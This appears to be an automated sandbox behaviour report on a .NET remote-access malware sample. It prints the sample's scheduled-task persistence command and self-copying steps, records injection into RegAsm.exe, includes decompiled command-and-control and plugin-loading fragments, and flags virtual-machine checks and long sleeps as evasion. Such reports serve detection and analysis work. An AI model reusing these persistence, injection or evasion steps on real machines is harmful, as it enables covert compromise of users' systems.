              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: avicap32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msvfw32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\fresh_shrunk.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: fresh_shrunk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: fresh_shrunk.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs | .Net Code: Memory
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs | .Net Code: Memory
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs | .Net Code: Memory
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs | .Net Code: Memory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02DD63AC push dword ptr [ecx+ecx-75h]; iretd 1_2_02DD63BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_02DD20D0 push esp; iretd 1_2_02DD20D1
Source: fresh_shrunk.exe | Static PE information: section name: .text entropy: 7.228149219206704
Source: bddddsx.exe.7.dr | Static PE information: section name: .text entropy: 7.228149219206704
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe (dropped file)

Boot Survival
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Process information set: NOOPENFILEERRORBOX (23 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (49 identical entries)
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Process information set: NOOPENFILEERRORBOX (23 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (20 identical entries)

Malware Analysis System Evasion
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Memory allocated: 2710000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Memory allocated: 2860000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Memory allocated: 4860000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 1180000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 2DF0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 1180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Memory allocated: 14B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Memory allocated: 2FB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | Memory allocated: 2CD0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 2E10000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 3040000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 2F90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\fresh_shrunk.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9796Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exe TID: 6900Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5480Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7164Thread sleep count: 49 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7164Thread sleep count: 9796 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe TID: 6208Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7092Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Users\user\Desktop\fresh_shrunk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: fresh_shrunk.exe, 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, bddddsx.exe, 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMU Virtual CPU
              Source: RegAsm.exe, 00000001.00000002.4135013411.0000000000FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A79008
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F57008
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
Source: C:\Windows\SysWOW64\cmd.exe ; Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
Source: C:\Windows\SysWOW64\cmd.exe ; Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Queries volume information: C:\Users\user\Desktop\fresh_shrunk.exe VolumeInformation
Source: C:\Users\user\Desktop\fresh_shrunk.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
